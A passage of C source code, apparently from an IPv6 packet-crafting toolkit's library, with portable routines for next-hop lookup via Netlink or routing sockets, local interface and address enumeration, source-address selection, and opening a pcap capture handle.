msg.msg_name = (void *)&them; msg.msg_namelen = sizeof(them); memset(&iov, 0, sizeof(iov)); iov.iov_base = (void *) &req.nl; iov.iov_len = req.nl.nlmsg_len; msg.msg_iov = &iov; msg.msg_iovlen = 1; /* send it */ if( (ret = sendmsg(sockfd, &msg, 0)) < 0){ if(idata->verbose_f) puts("Error in send()"); close(sockfd); return(FAILURE); } memset(reply, 0, sizeof(reply)); if( (ret = recv(sockfd, reply, sizeof(reply), 0)) < 0){ if(idata->verbose_f) puts("Error in recv()"); close(sockfd); return(FAILURE); } nll = ret; #ifdef DEBUG puts("DEBUG: sel_next_hop() going to loop through the results"); #endif /* This should eventually be improved to handle the case where messages are lost, since Netlink messages are reliable. */ for(nlp = (struct nlmsghdr *)reply; NLMSG_OK(nlp,nll); nlp = NLMSG_NEXT(nlp, nll)){ rtp = (struct rtmsg *) NLMSG_DATA(nlp); skip_f=0; if(rtp->rtm_family == AF_INET6){ for(rtap = (struct rtattr *) RTM_RTA(rtp), rtl = RTM_PAYLOAD(nlp); RTA_OK(rtap, rtl); rtap = RTA_NEXT(rtap,rtl)) { switch(rtap->rta_type){ case RTA_DST: #ifdef DEBUG print_ipv6_address("DEBUG: RTA_DST: ", (struct in6_addr *) RTA_DATA(rtap)); #endif /* If Destination is different from Destination Address, this just means that we need to send our packets to a local router */ /* if(!is_eq_in6_addr(&(idata->dstaddr), (struct in6_addr *) RTA_DATA(rtap))){ skip_f=1; } */ break; case RTA_OIF: idata->nhifindex= *((int *) RTA_DATA(rtap)); if(if_indextoname(idata->nhifindex, idata->nhiface) == NULL){ if(idata->verbose_f) puts("Error calling if_indextoname() from sel_next_hop()"); #ifdef DEBUG puts("DEBUG: RTA_OIF: iif_indextoname() failed"); #endif return(FAILURE); } #ifdef DEBUG printf("DEBUG: RTA_OIF: Index: %d, Name: %s\n", idata->nhifindex, idata->nhiface); #endif idata->nhifindex_f= 1; break; case RTA_GATEWAY: idata->nhaddr= *( (struct in6_addr *) RTA_DATA(rtap)); #ifdef DEBUG print_ipv6_address("DEBUG: RTA_GATEWAY: ", (struct in6_addr *) RTA_DATA(rtap)); #endif if(!IN6_IS_ADDR_UNSPECIFIED(&(idata->nhaddr))){ idata->nhaddr_f= 1; #ifdef DEBUG puts("DEBUG: set the nhaddr_F flag"); #endif } else{ #ifdef DEBUG puts("DEBUG: Did not set the nhaddr_f flag was ADR_UNSPECIFIED)"); #endif } break; } if(skip_f) break; } if(skip_f){ #ifdef DEBUG puts("DEBUG: Skipping set"); #endif continue; } } } close(sockfd); if(idata->nhifindex_f){ idata->nh_f=TRUE; #ifdef DEBUG puts("DEBUG: END sel_next_hop() (SUCCESS)"); #endif return(SUCCESS); } else{ #ifdef DEBUG puts("DEBUG: END sel_next_hop() (FAILURE)"); #endif return(FAILURE); } } #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) || defined(__FreeBSD_kernel__) || defined(__sun) || defined(sun) /* * Function: sel_next_hop() * * Find the next hop for a target destination */ int sel_next_hop(struct iface_data *idata){ int sockfd; pid_t pid; int seq; ssize_t r; unsigned int queries=0, i; char reply[MAX_RTPAYLOAD]; struct rt_msghdr *rtm; struct sockaddr_in6 *sin6; struct sockaddr_dl *sockpptr; struct sockaddr *sa; unsigned char onlink_f=FALSE; #ifdef DEBUG puts("DEBUG: BEGIN sel_next_hop()"); #endif if( (sockfd=socket(AF_ROUTE, SOCK_RAW, 0)) == -1){ if(idata->verbose_f) puts("Error in socket() call from sel_next_hop()"); #ifdef DEBUG puts("DEBUG: sel_next_hop() Failed when opening socket"); puts("DEBUG end sel_next_hop() (FAILURE)"); #endif return(FAILURE); } idata->nhaddr= idata->dstaddr; do{ rtm= (struct rt_msghdr *) reply; memset(rtm, 0, sizeof(struct rt_msghdr)); rtm->rtm_msglen= sizeof(struct rt_msghdr) + sizeof(struct sockaddr_in6); rtm->rtm_version= RTM_VERSION; rtm->rtm_type= RTM_GET; rtm->rtm_addrs= RTA_DST | RTA_IFP; rtm->rtm_pid= pid= getpid(); rtm->rtm_seq= seq= random(); sin6= (struct sockaddr_in6 *) (rtm + 1); memset(sin6, 0, sizeof(struct sockaddr_in6)); #ifdef SIN6_LEN sin6->sin6_len= sizeof(struct sockaddr_in6); #endif sin6->sin6_family= AF_INET6; sin6->sin6_addr= idata->nhaddr; if(write(sockfd, rtm, rtm->rtm_msglen) == -1){ if(idata->verbose_f) puts("write() failed. No route to the intenteded destination in the local routing table"); return(FAILURE); } do{ if( (r=read(sockfd, rtm, MAX_RTPAYLOAD)) < 0){ if(idata->verbose_f) puts("Error in read() call from sel_next_hop()"); return(FAILURE); } }while( rtm->rtm_type != RTM_GET || rtm->rtm_pid != pid || rtm->rtm_seq != seq); /* The rt_msghdr{} structure is followed by sockaddr structures */ sa= (struct sockaddr *) (rtm+1); for(i=0; irtm_addrs & (1 << i)){ switch(i){ case RTAX_GATEWAY: if(sa->sa_family == AF_INET6 && rtm->rtm_flags & RTF_GATEWAY){ idata->nhaddr= ((struct sockaddr_in6 *) sa)->sin6_addr; idata->nhaddr_f=TRUE; } break; case RTAX_IFP: if(sa->sa_family == AF_LINK){ sockpptr = (struct sockaddr_dl *) (sa); idata->nhifindex= sockpptr->sdl_index; idata->nhifindex_f=TRUE; if(if_indextoname(idata->nhifindex, idata->nhiface) == NULL){ puts("Error calling if_indextoname() from sel_next_hop()"); return(EXIT_FAILURE); } onlink_f=TRUE; } break; } #if defined(sun) || defined(__sun) if(i==RTAX_IFP || i==RTAX_IFA) sa = (struct sockaddr *) ((char *) sa + sizeof(struct sockaddr_dl)); else sa = (struct sockaddr *) ((char *) sa + sizeof(struct sockaddr_in6)); #else sa = (struct sockaddr *) ((char *) sa + SA_SIZE(sa)); #endif } } queries++; }while(!onlink_f && queries < 10); close(sockfd); if(idata->nhifindex_f){ #if defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) || defined(__FreeBSD_kernel__) if(IN6_IS_ADDR_LINKLOCAL(&(idata->nhaddr))){ /* BSDs store the interface index in s6_addr16[1], so we must clear it */ idata->nhaddr.s6_addr16[1] =0; idata->nhaddr.s6_addr16[2] =0; idata->nhaddr.s6_addr16[3] =0; } #endif #ifdef DEBUG puts("DEBUG: END sel_next_hop() (SUCCESS)"); #endif return(SUCCESS); } else{ #ifdef DEBUG puts("DEBUG: END sel_next_hop() (FAILURE)"); #endif return(FAILURE); } } #endif /* * Function: print_ipv6_addresss() * * Prints an IPv6 address with a legend */ unsigned int print_ipv6_address(char *s, struct in6_addr *v6addr){ char pv6addr[INET6_ADDRSTRLEN]; if(inet_ntop(AF_INET6, v6addr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); return(EXIT_FAILURE); } printf("%s%s\n", s, pv6addr); return(EXIT_SUCCESS); } /* * Function: print_ipv6_address_rev() * * Prints an IPv6 address in reversed form */ unsigned int print_ipv6_address_rev(struct in6_addr *v6addr){ int i; for(i=15; i>=0; i--){ printf("%01x.%01x%s", v6addr->s6_addr[i] & 0x0f, v6addr->s6_addr[i] >>4, i?".":"\n"); } return(EXIT_SUCCESS); } /* * Function: get_local_addrs() * * Obtains all local addresses (Ethernet and IPv6 addresses for all interfaces) */ int get_local_addrs(struct iface_data *idata){ struct iface_entry *cif; struct ifaddrs *ifptr, *ptr; struct sockaddr_in6 *sockin6ptr; #ifdef __linux__ struct sockaddr_ll *sockpptr; #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) || defined(__FreeBSD_kernel__) struct sockaddr_dl *sockpptr; #endif if(getifaddrs(&ifptr) != 0){ if(idata->verbose_f > 1){ puts("Error in call to getifaddrs()"); } return(FAILURE); } for(ptr=ifptr; ptr != NULL; ptr= ptr->ifa_next){ if(ptr->ifa_addr == NULL){ continue; } if(ptr->ifa_name == NULL){ #ifdef DEBUG puts("DEBUG: ifa_name was null"); #endif continue; } if( (cif = find_iface_by_name( &(idata->iflist), ptr->ifa_name)) == NULL){ if(idata->iflist.nifaces >= MAX_IFACES) continue; else{ cif= &(idata->iflist.ifaces[idata->iflist.nifaces]); strncpy(cif->iface, ptr->ifa_name, IFACE_LENGTH-1); cif->iface[IFACE_LENGTH-1]=0; /* XXX: Cannot otherwise find the index for tun devices? */ cif->ifindex= if_nametoindex(cif->iface); idata->iflist.nifaces++; } } #ifdef __linux__ if((ptr->ifa_addr)->sa_family == AF_PACKET){ sockpptr = (struct sockaddr_ll *) (ptr->ifa_addr); if(sockpptr->sll_halen == ETHER_ADDR_LEN){ memcpy(&(cif->ether), sockpptr->sll_addr, ETHER_ADDR_LEN); cif->ether_f= TRUE; } cif->ifindex= sockpptr->sll_ifindex; } #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) || defined(__FreeBSD_kernel__) if((ptr->ifa_addr)->sa_family == AF_LINK){ sockpptr = (struct sockaddr_dl *) (ptr->ifa_addr); if(sockpptr->sdl_alen == ETHER_ADDR_LEN){ memcpy(&(cif->ether), (sockpptr->sdl_data + sockpptr->sdl_nlen), ETHER_ADDR_LEN); cif->ether_f= TRUE; } cif->ifindex= sockpptr->sdl_index; } #endif else if((ptr->ifa_addr)->sa_family == AF_INET6){ sockin6ptr= (struct sockaddr_in6 *) (ptr->ifa_addr); if(IN6_IS_ADDR_LINKLOCAL( &(sockin6ptr->sin6_addr))){ if(cif->ip6_local.nprefix >= cif->ip6_local.maxprefix) continue; if(is_ip6_in_prefix_list( &(sockin6ptr->sin6_addr), &(cif->ip6_local)) == TRUE) continue; if( (cif->ip6_local.prefix[cif->ip6_local.nprefix] = malloc(sizeof(struct prefix_entry))) == NULL){ if(idata->verbose_f > 1) puts("Error while storing Source Address"); freeifaddrs(ifptr); return(FAILURE); } (cif->ip6_local.prefix[cif->ip6_local.nprefix])->len = 128; (cif->ip6_local.prefix[cif->ip6_local.nprefix])->ip6 = sockin6ptr->sin6_addr; #if defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) || defined(__FreeBSD_kernel__) /* BSDs store the interface index in s6_addr16[1], so we must clear it */ (cif->ip6_local.prefix[cif->ip6_local.nprefix])->ip6.s6_addr16[1] =0; (cif->ip6_local.prefix[cif->ip6_local.nprefix])->ip6.s6_addr16[2] =0; (cif->ip6_local.prefix[cif->ip6_local.nprefix])->ip6.s6_addr16[3] =0; #endif cif->ip6_local.nprefix++; } else{ if(is_ip6_in_prefix_list( &(sockin6ptr->sin6_addr), &(cif->ip6_global))) continue; if(IN6_IS_ADDR_LOOPBACK(&(sockin6ptr->sin6_addr))) cif->flags= IFACE_LOOPBACK; if(cif->ip6_global.nprefix >= cif->ip6_global.maxprefix) continue; if( (cif->ip6_global.prefix[cif->ip6_global.nprefix] = \ malloc(sizeof(struct prefix_entry))) == NULL){ if(idata->verbose_f > 1) puts("Error while storing Source Address"); freeifaddrs(ifptr); return(FAILURE); } (cif->ip6_global.prefix[cif->ip6_global.nprefix])->len = 128; (cif->ip6_global.prefix[cif->ip6_global.nprefix])->ip6 = sockin6ptr->sin6_addr; cif->ip6_global.nprefix++; } } } freeifaddrs(ifptr); #ifdef DEBUG debug_print_ifaces_data( &(idata->iflist)); #endif return(SUCCESS); } /* * Function: debug_print_ifaces_data() * * Prints the data correspoding to each interface */ void debug_print_ifaces_data(struct iface_list *iflist){ unsigned int i, j; struct iface_entry *iface; char plinkaddr[ETHER_ADDR_PLEN]; char pv6addr[INET6_ADDRSTRLEN]; for(i=0; i< iflist->nifaces; i++){ iface= iflist->ifaces +i; printf("DEBUG: Interface: %s (%d)\tFlags:%s%s\n", iface->iface, iface->ifindex, (iface->flags & IFACE_LOOPBACK)?" LOOPBACK":"",\ (iface->flags & IFACE_TUNNEL)?"TUNNEL":""); if(iface->ether_f){ if(ether_ntop(&(iface->ether), plinkaddr, sizeof(plinkaddr)) == 0){ puts("DEBUG: ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("DEBUG: Link address: %s\n", plinkaddr); } if( (iface->ip6_global).nprefix){ puts("DEBUG: Global addresses:"); for(j=0; j<(iface->ip6_global.nprefix); j++){ if(inet_ntop(AF_INET6, &((iface->ip6_global.prefix[j])->ip6), pv6addr, sizeof(pv6addr)) == NULL){ puts("DEBUG: inet_ntop(): Error converting IPv6 Address to presentation format"); exit(EXIT_FAILURE); } printf("DEBUG: %s\n", pv6addr); } } if( (iface->ip6_local).nprefix){ puts("DEBUG: Local addresses:"); for(j=0; j<(iface->ip6_local.nprefix); j++){ if(inet_ntop(AF_INET6, &((iface->ip6_local.prefix[j])->ip6), pv6addr, sizeof(pv6addr)) == NULL){ puts("DEBUG: inet_ntop(): Error converting IPv6 Address to presentation format"); exit(EXIT_FAILURE); } printf("DEBUG: %s\n", pv6addr); } } puts(""); } } /* * Function: find_iface_by_name() * * Finds an Interface (by name) in an Interface list */ void *find_iface_by_name(struct iface_list *iflist, char *iface){ unsigned int i; for(i=0; i < iflist->nifaces; i++){ if(strncmp((iflist->ifaces[i]).iface, iface, IFACE_LENGTH) == 0) return(&(iflist->ifaces[i])); } return(NULL); } /* * Function: find_iface_by_index() * * Finds an Interface (by index) in an Interface list */ void *find_iface_by_index(struct iface_list *iflist, int ifindex){ unsigned int i; for(i=0; i < iflist->nifaces; i++){ if((iflist->ifaces[i]).ifindex == ifindex) return(&(iflist->ifaces[i])); } return(NULL); } /* * Function: find_iface_by_addr() * * Finds an Interface (by IPv6 address) in an Interface list */ void *find_iface_by_addr(struct iface_list *iflist, struct in6_addr *addr){ unsigned int i; for(i=0; i < iflist->nifaces; i++){ if(is_ip6_in_prefix_list(addr, &((iflist->ifaces[i]).ip6_global)) || is_ip6_in_prefix_list(addr, &((iflist->ifaces[i]).ip6_local))) return(&(iflist->ifaces[i])); } return(NULL); } /* * Function: is_in6addr_iniface_list() * * Finds an Interface (by name) in an Interface list */ int is_ip6_in_iface_entry(struct iface_list *iflist, int ifindex, struct in6_addr *addr){ unsigned int i; for(i=0; i < iflist->nifaces; i++){ if(iflist->ifaces[i].ifindex == ifindex){ if(is_ip6_in_prefix_list(addr, &(iflist->ifaces[i].ip6_global))) return(TRUE); else if(is_ip6_in_prefix_list(addr, &(iflist->ifaces[i].ip6_local))) return(TRUE); } } return(FALSE); } /* * Function: find_matching_address() * * Finds the longest matching address in an Interface list */ struct iface_entry *find_matching_address(struct iface_data *idata, struct iface_list *iflist, struct in6_addr *dst, struct in6_addr *match){ unsigned int i, j, mlen, len; struct iface_entry *cif=NULL; /* Not needed, but avoids warning in OpenBSD/gcc */ mlen= 0; for(i=0; i < iflist->nifaces; i++){ if(idata->iface_f && (idata->ifindex != (iflist->ifaces[i]).ifindex)) continue; for(j=0; j < (iflist->ifaces[i]).ip6_local.nprefix; j++){ if( (len= ip6_longest_match( &((iflist->ifaces[i].ip6_local.prefix[j])->ip6), dst)) >= mlen){ cif= &(iflist->ifaces[i]); *match= (iflist->ifaces[i].ip6_local.prefix[j])->ip6; mlen= len; } if(mlen >= 64){ return(cif); } } for(j=0; j < (iflist->ifaces[i]).ip6_global.nprefix; j++){ if( (len= ip6_longest_match( &((iflist->ifaces[i].ip6_global.prefix[j])->ip6), dst)) >= mlen){ cif= &(iflist->ifaces[i]); *match= (iflist->ifaces[i].ip6_global.prefix[j])->ip6; mlen= len; } if(mlen >= 64){ return(cif); } } } return(cif); } /* * Function: ip6_longest_match() * * Finds the mask that two IPv6 addresses have in common */ unsigned int ip6_longest_match(struct in6_addr *addr1, struct in6_addr *addr2){ unsigned int mask, step=1, match=0; struct in6_addr a1, a2; for(mask=0; mask <= 64; mask=mask+step){ a1= *addr1; a2= *addr2; sanitize_ipv6_prefix(&a1, mask); sanitize_ipv6_prefix(&a2, mask); if(!is_eq_in6_addr(&a1, &a2)) return(match); else match=mask; } return(64); } /* * Function: sel_src_addr() * * Selects a Source Address for a given Destination */ int sel_src_addr(struct iface_data *idata){ struct in6_addr match; struct iface_entry *cif, *nhif; #ifdef DEBUG puts("DEBUG: BEGIN sel_src_addr()"); #endif /* If the packet is directed to a link-local addresses, the ourgoing interface should have been specified. If not, that's a failure. If specified, we give higher priority to link-local addresses */ if(IN6_IS_ADDR_LINKLOCAL(&(idata->dstaddr))){ #ifdef DEBUG puts("DEBUG: Destination is link-local"); #endif if(!idata->iface_f){ #ifdef DEBUG puts("DEBUG: Interface not specified"); puts("DEBUG: END sel_src_addr() (FAILURE)"); #endif return(FAILURE); } else{ #ifdef DEBUG puts("DEBUG: Interface has been specified"); #endif if( (cif=find_iface_by_index( &(idata->iflist), idata->ifindex)) == NULL){ #ifdef DEBUG puts("DEBUG: Did not find interface in local data"); puts("DEBUG: END sel_src_addr() (FAILURE)"); #endif return(FAILURE); } else{ #ifdef DEBUG puts("DEBUG: Found interface in local data"); #endif idata->ether= cif->ether; idata->ether_flag= cif->ether_f; idata->flags= cif->flags; if((cif->ip6_local).nprefix){ idata->ip6_local= (cif->ip6_local).prefix[0]->ip6; idata->ip6_local_flag= TRUE; } idata->ip6_global= cif->ip6_global; if((idata->ip6_global).nprefix) idata->ip6_global_flag= TRUE; /* Since destination is a link-local address, use a link-local address as IPv6 Source Address if available. */ if(idata->ip6_local_flag == TRUE){ idata->srcaddr= (cif->ip6_local.prefix[0])->ip6; idata->srcaddr_f= ADDR_AUTO; #ifdef DEBUG puts("DEBUG: END sel_src_addr() (SUCCESS)"); #endif return(SUCCESS); } else if(idata->ip6_global_flag == TRUE){ idata->srcaddr= (cif->ip6_local.prefix[0])->ip6; idata->srcaddr_f= ADDR_AUTO; #ifdef DEBUG puts("DEBUG: END sel_src_addr() (SUCCESS)"); #endif return(SUCCESS); } } } } else{ #ifdef DEBUG puts("DEBUG: Destination is NOT link-local"); #endif /* If the destination address is not a link-local address, then: 1) If the interface has been specified, we select an IPv6 address assigned to that interface (prioritizing "global" addresses) 2) If an interface has not been specified, we select the longest-matching address for that destination */ if(idata->iface_f){ #ifdef DEBUG puts("DEBUG: Interface was specified"); #endif if( (cif=find_iface_by_index( &(idata->iflist), idata->ifindex)) == NULL){ #ifdef DEBUG puts("DEBUG: Did not find interface in local data"); puts("DEBUG: END sel_src_addr() (FAILURE)"); #endif return(FAILURE); } else{ idata->ether= cif->ether; idata->ether_flag= cif->ether_f; idata->flags= cif->flags; idata->ip6_global= cif->ip6_global; if(cif->ip6_global.nprefix){ idata->ip6_global_flag= TRUE; } if((cif->ip6_local).nprefix){ idata->ip6_local= (cif->ip6_local).prefix[0]->ip6; idata->ip6_local_flag= TRUE; } if(idata->ip6_global_flag){ /* XXX This should be replaced with "find the longest match for this list */ idata->srcaddr= (idata->ip6_global).prefix[0]->ip6; idata->srcaddr_f= ADDR_AUTO; #ifdef DEBUG puts("DEBUG: END sel_src_addr() Used global address (SUCCESS)"); #endif return(SUCCESS); } else if(idata->ip6_local_flag){ idata->srcaddr= idata->ip6_local; idata->srcaddr_f= ADDR_AUTO; #ifdef DEBUG puts("DEBUG: END sel_src_addr() Used local address (SUCCESS)"); #endif return(SUCCESS); } else{ #ifdef DEBUG puts("DEBUG: END sel_src_addr() Have no IPv6 addresses (FAILURE)"); #endif return(FAILURE); } } } else{ #ifdef DEBUG puts("DEBUG: Interface was not specified"); #endif if( (cif=find_matching_address(idata, &(idata->iflist), &(idata->dstaddr), &match)) != NULL){ idata->srcaddr= match; idata->srcaddr_f= ADDR_AUTO; strncpy(idata->iface, cif->iface, IFACE_LENGTH-1); idata->iface[IFACE_LENGTH-1]= 0; idata->ifindex= cif->ifindex; idata->ifindex_f= TRUE; idata->flags= cif->flags; #ifdef DEBUG puts("DEBUG: Found a matching address"); print_ipv6_address("DEBUG: Src addr: ", &(idata->srcaddr)); printf("DEBUG: Interface name: %s, Index: %d\n", idata->iface, idata->ifindex); #endif /* We know check whether the selected address belongs to the outgoing interface -- otherwise packets might be filtered */ if(sel_next_hop(idata) == SUCCESS){ #ifdef DEBUG puts("DEBUG: sel_next_hop() suceeded"); #endif if( (nhif=find_iface_by_index( &(idata->iflist), idata->nhifindex)) == NULL){ return(FAILURE); } if( (nhif->flags & IFACE_LOOPBACK) || is_ip6_in_iface_entry(&(idata->iflist), idata->nhifindex, &(idata->srcaddr)) == TRUE){ #ifdef DEBUG puts("DEBUG: Selected address was in outgoing interface"); #endif if((cif->ip6_local).nprefix){ idata->ip6_local= (cif->ip6_local).prefix[0]->ip6; idata->ip6_local_flag= TRUE; } idata->ip6_global= cif->ip6_global; if((idata->ip6_global).nprefix) idata->ip6_global_flag= TRUE; idata->ether= cif->ether; idata->ether_flag= cif->ether_f; idata->srcaddr_f= ADDR_AUTO; #ifdef DEBUG print_ipv6_address("DEBUG: Src addr: ", &(idata->srcaddr)); puts("DEBUG: END sel_src_addr() (SUCCESS)"); #endif return(SUCCESS); } else{ #ifdef DEBUG puts("DEBUG: Selected address was NOT in outgoing interface"); #endif /* If the seleted address doesn't correspond to the outgoing interface, throw away the previously-selected IPv6 Address, and select one that is assigned to the outgoing interface. */ if( (cif= find_iface_by_index(&(idata->iflist), idata->nhifindex)) == NULL){ #ifdef DEBUG puts("DEBUG: END Did not find interface in local data"); puts("DEBUG: END sel_src_addr() (FAILURE)"); #endif return(FAILURE); } else{ #ifdef DEBUG puts("DEBUG: Copying data from output interface into idata"); #endif idata->ether= cif->ether; idata->ether_flag= cif->ether_f; idata->ifindex= idata->nhifindex; idata->flags= cif->flags; strncpy(idata->iface, idata->nhiface, IFACE_LENGTH-1); if((cif->ip6_local).nprefix){ idata->ip6_local= (cif->ip6_local).prefix[0]->ip6; idata->ip6_local_flag= TRUE; } idata->ip6_global= cif->ip6_global; if((idata->ip6_global).nprefix) idata->ip6_global_flag= TRUE; if(idata->ip6_global_flag == TRUE){ idata->srcaddr= (cif->ip6_global.prefix[0])->ip6; idata->srcaddr_f= ADDR_AUTO; #ifdef DEBUG puts("DEBUG: Used global src addr for global dst addr"); print_ipv6_address("DEBUG: Src addr: ", &(idata->srcaddr)); puts("DEBUG: END sel_src_addr() (SUCCESS)"); #endif return(SUCCESS); } else if(idata->ip6_local_flag){ idata->srcaddr= idata->ip6_local; idata->srcaddr_f= ADDR_AUTO; #ifdef DEBUG puts("DEBUG: Used local src addr for global dst addr"); print_ipv6_address("DEBUG: Src addr: ", &(idata->srcaddr)); puts("DEBUG: END sel_src_addr() (SUCCESS)"); #endif return(SUCCESS); } } } } } } } #ifdef DEBUG puts("DEBUG: END sel_src_addr() (FAILURE)"); #endif return(FAILURE); } /* * Function: load_dst_and_pcap() * * Finds the Sorurce Address, Next-Hop, and outgoing interface for a given Destination Address */ int load_dst_and_pcap(struct iface_data *idata, unsigned int mode){ struct iface_entry *cif, *rif; struct in6_addr randprefix, loopback; unsigned char randpreflen; char errbuf[PCAP_ERRBUF_SIZE]; if(mode != LOAD_PCAP_ONLY){ if(idata->srcprefix_f){ randprefix= idata->srcaddr; randpreflen= idata->srcpreflen; randomize_ipv6_addr(&(idata->srcaddr), &randprefix, randpreflen); idata->srcaddr_f=1; } if(get_local_addrs(idata) == FAILURE){ if(idata->verbose_f) puts("Error while obtaining local addresses"); return(FAILURE); } if(!idata->srcaddr_f){ #ifdef DEBUG puts("DEBUG: Has not specified source address"); #endif /* If no source address or prefix have been specified, then we need to automatically learn our IPv6 address. This is our appraoch: * Firstly, assume that our host has IPv6 connectivity: + If an interface has been specified, select an IPv6 address from one of the configures addresses of such interface. * If an interface has not been specified, select a source address taking into consideration all configured addresses. * If that doesn't succeed, try sending RAs */ if(sel_src_addr(idata) == SUCCESS){ if(sel_next_hop(idata) == SUCCESS){ /* This is actually redundant (nh_f is already set by sel_next_hop() */ #ifdef DEBUG puts("DEBUG: sel_next_hop() succeeded"); #endif idata->nh_f= TRUE; } else{ #ifdef DEBUG puts("DEBUG: sel_next_hop() failed"); #endif } #ifdef DEBUG printf("DEBUG: nhifindex_f: %s\tnhaddr_f: %s", (idata->nhifindex_f)?"TRUE":"FALSE", (idata->nhaddr_f)?"TRUE":"FALSE"); if(idata->nhifindex_f) printf("\tnhifindex: %d ", idata->nhifindex); if(idata->nhaddr_f) print_ipv6_address("\tnhaddr: ", &(idata->nhaddr)); else puts(""); #endif } if(idata->nh_f == FALSE){ #ifdef DEBUG puts("DEBUG: Automatic address selection failed"); #endif /* XXX Should really free the memory allocated by the other functions, since they are of no further use */ idata->ip6_local_flag= FALSE; idata->ip6_global.nprefix=0; idata->ip6_global_flag= FALSE; if(!idata->iface_f){ #ifdef DEBUG puts("DEBUG: No automatic address selection, and no specified interface"); #endif if(idata->verbose_f) puts("Could not determine next hop address"); return(FAILURE); } /* This sends an RA, populates the local addresses and prefixes, and the local router */ if(sel_next_hop_ra(idata) == -1){ #ifdef DEBUG puts("DEBUG: sel_next_hop_ra() failed"); #endif puts("Could not learn a local router"); return(FAILURE); } if(sel_src_addr_ra(idata, &(idata->dstaddr)) == FAILURE || !idata->ether_flag || !idata->ip6_global_flag || !idata->ip6_local_flag){ #ifdef DEBUG puts("DEBUG: sel_src_addr_ra() failed"); #endif puts("Could not obtain local address **"); return(FAILURE); } idata->ifindex= if_nametoindex(idata->iface); idata->ifindex_f= TRUE; } } else{ #ifdef DEBUG puts("DEBUG: Has specified source address"); #endif if(sel_next_hop(idata) == SUCCESS){ #ifdef DEBUG puts("DEBUG: sel_next_hop() succeeded"); #endif idata->ifindex= idata->nhifindex; idata->nh_f= TRUE; strncpy(idata->iface, idata->nhiface, IFACE_LENGTH-1); idata->iface[IFACE_LENGTH-1]=0; if( (cif=find_iface_by_index(&(idata->iflist), idata->ifindex)) != NULL){ idata->ether= cif->ether; idata->ether_flag= cif->ether_f; } } else{ #ifdef DEBUG puts("DEBUG: sel_next_hop() DID NOT succeed, Now trying RAs"); #endif /* This sends an RA, populates the local addresses and prefixes, and the local router */ if(sel_next_hop_ra(idata) == -1){ #ifdef DEBUG puts("DEBUG: ssel_next_hop_ra() failed"); #endif puts("Could not learn a local router"); return(FAILURE); } } } /* If a next hop was found, we employ whatever was found as the output interface, because we need to open a pcap_t for that interface */ if(idata->nhifindex_f){ #ifdef DEBUG puts("sel_next eligio nh_index"); #endif idata->ifindex= idata->nhifindex; if( (cif = find_iface_by_index( &(idata->iflist), idata->ifindex)) == NULL){ if(idata->verbose_f){ puts("Could not find selected interface in local data"); } #ifdef DEBUG puts("No la interfaz que buscaba"); #endif return(FAILURE); } idata->flags= cif->flags; if(if_indextoname(idata->ifindex, idata->iface) == NULL){ if(idata->verbose_f) puts("Error calling if_indextoname() from sel_next_hop()"); #ifdef DEBUG puts("DEBUG: if_indextoname() failed"); #endif return(FAILURE); } } #ifdef DEBUG puts("Voy a chequear si es loopback"); #endif if( !(idata->flags & IFACE_LOOPBACK)){ #ifdef DEBUG puts("COmprobe que era distinta de loopback"); #endif if(is_ip6_in_prefix_list( &(idata->dstaddr), &(idata->ip6_global)) || \ is_eq_in6_addr( &(idata->dstaddr), &(idata->ip6_local))){ #ifdef DEBUG puts("ENcontre la dst en mi lista de direcciones"); #endif /* Since we're sending a packet on the same interface to which the destination address belongs, the packet should actually be sent to the loopback interface */ if ( inet_pton(AF_INET6, LOOPBACK_ADDR, &loopback) <= 0){ if(idata->verbose_f) puts("inet_pton(): Error converting loopback address from presentation to network format"); #ifdef DEBUG puts("inet_pton dio error"); #endif return(FAILURE); } if( (rif=find_iface_by_addr( &(idata->iflist), &loopback)) == NULL){ #ifdef DEBUG puts("No encontre loopback"); #endif if(idata->verbose_f) puts("Could not find loopback interface in local data"); return(FAILURE); } else{ #ifdef DEBUG puts("Encontre loopback y voy a sobreeescribir la info de destino"); #endif idata->flags= rif->flags; idata->ifindex= rif->ifindex; strncpy(idata->iface, rif->iface, IFACE_LENGTH); } } } } else{ if(!idata->iface_f){ if(idata->verbose_f){ puts("Error opening pcap socket because interface was not specified"); } return(FAILURE); } idata->ifindex= if_nametoindex(idata->iface); idata->ifindex_f= TRUE; if(get_if_addrs(idata) == -1){ if(idata->verbose_f){ puts("Error while obtaining local interface data"); } return(FAILURE); } } if(idata->nhifindex_f && !idata->nhaddr_f) idata->nhaddr= idata->dstaddr; #ifdef DEBUG if(idata->nhaddr_f) print_ipv6_address("DEBUG: load_dst_(): Nex Hop: ", &(idata->nhaddr)); else puts("DEBUG: load_dst() Next Hop address not set"); printf("DEBUG: Output interface: %s (%d)\n", idata->iface, idata->ifindex); #endif if(!(idata->hsrcaddr_f)){ if(idata->ether_flag) idata->hsrcaddr=idata->ether; else{ randomize_ether_addr(&(idata->hsrcaddr)); } } if(!idata->ip6_local_flag){ ether_to_ipv6_linklocal(&idata->ether, &idata->ip6_local); } if( (idata->pfd= pcap_open_live(idata->iface, PCAP_SNAP_LEN, PCAP_PROMISC, PCAP_TIMEOUT, errbuf)) == NULL){ printf("pcap_open_live(%s): %s\n", idata->iface, errbuf); return(FAILURE); } if (pcap_setnonblock(idata->pfd, 1, errbuf) == -1) { printf("pcap_setnonblock(): %s\n", errbuf); return(FAILURE); } if( (idata->fd= pcap_fileno(idata->pfd)) == -1){ if(idata->verbose_f) puts("Error obtaining descriptor number for pcap_t"); return(FAILURE); } if( (idata->type = pcap_datalink(idata->pfd)) == DLT_EN10MB){ idata->linkhsize= ETH_HLEN; idata->mtu= ETH_DATA_LEN; } else if( idata->type == DLT_RAW){ idata->linkhsize=0; idata->mtu= MIN_IPV6_MTU; idata->flags|= IFACE_TUNNEL; } #if defined (__OpenBSD__) else if( idata->type == DLT_LOOP){ idata->linkhsize=4; idata->mtu= MIN_IPV6_MTU; idata->flags|= IFACE_TUNNEL; } #elif defined(__linux__) else if( idata->type == DLT_LINUX_SLL){ 